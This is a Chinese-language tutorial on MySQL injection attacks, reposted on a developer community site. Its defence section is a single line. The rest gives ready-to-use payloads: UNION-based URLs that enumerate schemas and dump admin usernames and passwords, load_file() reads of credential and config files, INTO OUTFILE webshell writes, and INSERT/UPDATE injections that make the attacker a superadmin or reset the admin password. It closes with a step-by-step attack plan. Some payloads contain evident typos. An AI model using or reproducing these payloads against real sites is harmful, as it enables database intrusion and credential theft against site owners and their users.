MySQL注射攻击与防范详解-阿里云开发者社区

开发者社区> 技术小美> 正文

MySQL注射攻击与防范详解

简介:
+关注继续查看

 

PHP+MySQL JSP+MySQL 

一.基础知识 
1.MYSQL的版本 
4.0以下4.0以上5.0以上。 
4.0以下不支持union查询 
4.0以上magic_quotes_gpc默认为on 
5.0以上可以暴表暴列支持跨库 
2.magic_quotes_gpc=on 
当php.ini里的 magic_quotes_gpc 为On 时。提交的变量中所有的 ' (单引号), " (双引号), \(反斜线) and 空字符会自动转为含有反斜线的转义字符。例如'会变成\'。给注入带来不少的阻碍。 
3.注释符 
Mysql有3种注释句法 
# 注射掉注释符后面的本行内容 
-- 注射效果同# 
/* ... */  注释掉符号中间的部分 
对于#号将是我们最常用的注释方法。 
-- 号记得后面还得有一个空格才能起注释作用。 

/*...*/  我们一般只用前面的/*就够了。 
注意在浏览器地址栏输入#时应把它写成%23这样经urlencode转换后才能成为#从而起到注释的作用。 
注射中常用/**/代替空格。 

4.一些函数与MSSQL中的不同 
ascii() 
length() 
5.导出文件into outfile 
使用  into outfile 把代码写到web目录取得WEBSHELL   
首先需要 3大先天条件 
①知道物理路径(into outfile '物理路径') 这样才能写对目录 
②能够使用union (也就是说需要MYSQL4以上的版本) 
③对方没有对'进行过滤(因为outfile 后面的 '' 不可以用其他函数代替转换) 
后天条件就要2个 
①就是MYSQL 用户拥有file_priv权限(不然就不能写文件 或者把文件内容读出) 
②对web目录有写权限MS 的系统就不说了一般都会有权限的~但是*nix 的系统嘛通常都是rwxr-xr-x 也就是说组跟其他用户都没有权限写操作 
6.读取文件load_file() 
serv-U默认安装路径的servudaemon.ini。注意可以变化D盘E盘…… 
读取数据库配置文件 
IIS站点配置信息c:\windows\system32\inetsrv\metabase.xml 
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件 
/usr/local/apache2/conf/httpd.conf 
/usr/local/app/php5/lib/php.ini //PHP相关设置 
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置 
/etc/my.cnf //mysql的配置文件 
/etc/redhat-release //系统版本 
C:\mysql\data\mysql\user.MYD //us存储了mysql.er表中的数据库连接密码 
/etc/sysconfig/iptables //从中得到防火墙规则策略 

7.绝对路径 
1.加特殊符号访问不存在的链接 
2.读取服务器配置文件 
3.直接访问 
phpmyadmin/libraries/select_lang.lib.php 
phpmyadmin/darkblue_orange/layout.inc.php 
phpmyadmin/index.php?lang[]=1 
8.网站OS版本 
变换大小写。 
9.PHPMyadmin路径 
在测试uninx系统中phpmyadmin路径时候可以在upload/2011/5/201105170148018831.jpg 
2004091201.jpg中的内容为 一句话 
好我们开始upload/2011/5/201105170148026134.jpg'),4,5,6,7,8,9,10,11%20into%20outfile'C:/apache/htdocs/site/shell.php' 
因为适用了outfile所以网页显示不正常但是我们的任务是完成了。 
load_file读写文件的技巧 
不知道你有没有发现过在我们用load_file()读写php文件时不能在网页中显示。例如 
'C:/apache/htdocs/site/lib/sql.inc.php'转化为16进制为0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870 
我们构造如下 
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11 
发现在文章内容的地方本来该显示sql.inc.php的可是却空空之为何呢 内容在源代码里面。 
substring() left() right() mid() 

into outfile'' 不能绕过 
mysql 5.0以下的跨库查询 
变相的跨库查询方法就是通过load_file来直接读出mysql中data文件夹下的文件内容从而实现变态跨库查询。 
举个例子啦 
在这之前我们先讲一下mysql的data文件夹下的结构 
Data文件夹下有按数据库名生成的文件夹文件夹下按照表名生成三个后缀为frm,myd,myi的三个文件例如 
Mysql中有alpha数据库在alpha库中有alphaauthor和alphadb两个表 
Alpha文件夹下就有alphadb.frmalphadb.mydalphadb.myialphaauthor.frm,alphaauthor.myd,alphaauthor.myi 
其中alphadb.frm放着lphadb表中的数据alphadb.myd放着表的结构alphadb.myi中放的内容随mysql的版本不同会有所不同具体可以自己用记事本打开来判断。 
实验开始 
假设我们知道有另外的一个数据库yminfo210存在且存在表useruser中放着admin的信息。 
我们 
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file('yminfuo210/ser.myd'),4,5,6,7,8,9,10,11 
说明一下load_file默认所在的目录是mysql下的data目录所以我们用 
load_file('yminfo210/user.myd')当然load_file('.info210/user.myd')也是一样的注意的是into outfile的默认路径是在所在的数据库文件夹下。 
我们看读出来的内容 
舼鮂F鮂F?   admin 698d51a19d8a121ce581499d7b701668 sdf@sd.com sdfasdfsdfa asdfadfasd   ?E麷AM麷A 127.0.0.1 222  222222223423 
虽然乱码一堆但是我们还是可以看出用户名是admin密码是698d51a19d8a121ce581499d7b701668后面其它的是另外的信息。 
通过这种方法我们就实现了曲线跨库。 
3.其他一些注射语句insert注射和update注射 
INSERT 
  如果大家认为MYSQL中注入仅仅适用于SELECT就大错特错了其实还有两个危害更大的操作那就是INSERT和UPDATE语句这类例子不多先面先说说INSERT这主要应用于改写插入的数据我们来看个简单而又广泛存在的例子看看下面的数据结构 
CREATE TABLE 'user' ( 
'userid' INT NOT NULL AUTO_INCREMENT , 
'username' VARCHAR( 20 ) NOT NULL , 
'password' VARCHAR( 50 ) NOT NULL , 
'homepage' VARCHAR( 255 ) NOT NULL , 
'userlevel' INT DEFAULT '1' NOT NULL , 
PRIMARY KEY ( 'userid' ) 
); 

  其中的userlevel代表用户的等级1是普通用户2是普通管理员3是超级管理员一个注册程序默认是注册成普通用户如下 
INSERT INTO 'user' (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1'); 

  默认userlevel字段是插入1其中的变量都是没有经过过滤就直接写入数据库的不知道大家有什么想法对就是直接注入使我们一注册就是超级管理员。我们注册的时候构造$homepage变量就可以达到改写的目的指定$homepage变量为 
http://4ngel.net', '3’)# 

  插入数据库的时候就变成 
INSERT INTO 'user' (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3’)#', '1'); 

  这样就注册成为超级管理员了。但这种利用方法也有一定的局限性比如我没有需要改写的变量如userlevel字段是数据库的第一个字段前面没有地方给我们注入我们也没有办法了。 
或许INSERT还有更广泛的应用大家可以自行研究但原理都是一样的。 
UPDATE 
  和INSERT相比UPDATE的应用更加广泛如果过滤不够足以改写任何数据还是拿刚才的注册程序来说数据结构也不变我们看一下用户自己修改自己的资料SQL语句一般都是这样写的 
UPDATE user SET password='$password', homepage='$homepage' WHERE id='$id' 

  用户可以修改自己的密码和主页大家有什么想法总不至于还是提升权限吧程序中的SQL语句又没有更新userlevel字段怎么提升啊还是老办法构造$homepage变量, 指定$homepage变量为 
http://4ngel.net', userlevel='3 

  整个SQL语句就变成这样 
UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id' 

  我们是不是又变成超级管理员了程序不更新userlevel字段我们自己来。 
还有更加绝的直接修改任意用户的资料还是刚才的例句但这次安全一点使用MD5加密 
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id' 

  尽管密码被加密了但我们还是可以构造我们需要的语句我们指定$password为 
mypass)' WHERE username='admin'# 

  这时整个语句变为 
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id' 

  这样就更改了更新的条件我管你后面的代码是不是在哭这说我们还没有执行啊。当然也可以从$id下手指定$id为 
' OR username='admin' 

  这时整个语句变为 
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin' 

4.MySQL5.0以上的新特性 
系统表的结构 
SCHEMATA         ――>存储数据库名的 
|——>关键字段SCHEMA_NAME表示数据库名称 
                       
| TABLES              ――>存储表名的   
|——>关键字段TABLE_SCHEMA表示表所属的数据库名称 
TABLE_NAME表示表的名称 

| COLUMNS   ――>存储字段名的 
|——>关键字段TABLE_SCHEMA表示表所属的数据库名称 
TABLE_NAME表示所属的表的名称 
             COLUMN_NAME表示字段名 

爆管理员账号密码找到后台登陆。 

前面爆管理员账号密码前有可能猜表都猜不到。这里教大家暴库爆表爆字段。 
http://127.0.0.1/ad.php?id=1 and 1=2 union select 1,2,3,4,schema_name,6,7,8 from information_schema.SCHEMATA limit 0,1/* 
这样会爆出一个数据库。前面我们轻而易举的可以得到一个当前连接的数据库。 
我们要爆出的数据库里要存放管理员的用户和密码。 
这里limit 0,1/*的意思是爆出第一个库的名字如果要查看第二个数据库名就增加limit后面的值比如把0增加为1就又爆出一个库名。逐次加1就分别暴出了网站的其他数据库名。 
已经知道网站数据库名是study继续爆表。 
http://127.0.0.1/ad.php?id=1 and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.table where TABLE_SCHEMA=0x7374756479 limit 0,1/* 
这里0x7374756479就是study的16进制形式。成功爆出一个表名。我们在增加limit后面的数字来逐一爆出数据库中的其他表名。 
爆字段 
http://127.0.0.1/ad.php?id=1 and 1=2 union select 1,2,3,4,COLUMN_NAME,6,7,8 from information_schema.COLUMN_NAME where TABLE_NAME=0x61646D696E limit 0,1/* 
成功爆出admin表中的一个字段。0x61646D696E为admin的16进制。 

有时候我们用union联合查询前猜到的字段长度可能是1这样对我们就有所限制了。我们可以借助concat函数来一次性爆出我们所希望得到的东西。具体用法是concat(我们想要爆的,0x3A,我们想要爆的,0x3A,我们想要爆的……) 
http://127.0.0.1/ad.php?id=1 and 1=2 union select concat(user(),0x3A,database(),0x3A,version()) 
0x3A是;的16进制形式。 

PHP跨库查询。当前库realmd要跨到BBS的库为discuz,默认中discuz数据库中存放用户信息的表是cdb_members ,两个字段为username,password 
http://127.0.0.1/ad.php?id=1 and 1=1 union select 1,2,3,4,5,6,7,8 from discuz.cdb_members返回正常说明跨库查询成功。并且数据库和表都是存在的。 
http://127.0.0.1/ad.php?id=1 and 1=2 union select 1,username,3,password,5,6,7,8 from discuz.cdb.members where uid=1 
延伸——跨库后同样可以爆表爆字段。 
http://127.0.0.1/ad.php?id=1 and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.table where TABLE_SCHEMA=discuz limit 0,1/* 
http://127.0.0.1/ad.php?id=1 and 1=2 union select 1,2,3,4,COLUMN_NAME,6,7,8 from information_schema.COLUMN_NAME where TABLE_NAME=discuz.cdb_members limit 0,1/* 
schema_name  information_schema.SCHEMATA 
table_name  information_schema.table  TABLE_SCHEMA 
COLUMN_NAME  information_schema.COLUMN_NAME  TABLE_NAME 
三.攻击思路 

如果magic_quotes_gpc=off 尝试into outfile直接得到一个shell 
判断数据库版本可以尝试各个版本的溢出漏洞 
如果能load_file可以load_file出数据库的账户密码 
连接或者是找到phpmyadmin后登陆 
登陆后创建一个表导出一个shell或者into outfile 一个shell 
也可以load_file serv-U的相关信息利用FTP登陆 
猜测管理员账户密码找到后台登陆获得shell 
本库不行可以跨库。 

四.漏洞防御 
变量的过滤 
开启magic_quotes_gpc并且int型变量做一个判断。












本文转hackfreer51CTO博客原文链接http://blog.51cto.com/pnig0s1992/567470如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,大概有三种登录方式:
2917 0
阿里云服务器ECS远程登录用户名密码查询方法
阿里云服务器ECS远程连接登录输入用户名和密码,阿里云没有默认密码,如果购买时没设置需要先重置实例密码,Windows用户名是administrator,Linux账号是root,阿小云来详细说下阿里云服务器远程登录连接用户名和密码查询方法
11167 0
阿里云服务器端口号设置
阿里云服务器初级使用者可能面临的问题之一. 使用tomcat或者其他服务器软件设置端口号后,比如 一些不是默认的, mysql的 3306, mssql的1433,有时候打不开网页, 原因是没有在ecs安全组去设置这个端口号. 解决: 点击ecs下网络和安全下的安全组 在弹出的安全组中,如果没有就新建安全组,然后点击配置规则 最后如上图点击添加...或快速创建.   have fun!  将编程看作是一门艺术,而不单单是个技术。
10823 0
使用SSH远程登录阿里云ECS服务器
远程连接服务器以及配置环境
2460 0
使用OpenApi弹性释放和设置云服务器ECS释放
云服务器ECS的一个重要特性就是按需创建资源。您可以在业务高峰期按需弹性的自定义规则进行资源创建,在完成业务计算的时候释放资源。本篇将提供几个Tips帮助您更加容易和自动化的完成云服务器的释放和弹性设置。
12020 0
阿里云服务器ECS登录用户名是什么?系统不同默认账号也不同
阿里云服务器Windows系统默认用户名administrator,Linux镜像服务器用户名root
3985 0
+关注
6906
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
《2021云上架构与运维峰会演讲合集》
立即下载
《零基础CSS入门教程》
立即下载
《零基础HTML入门教程》
立即下载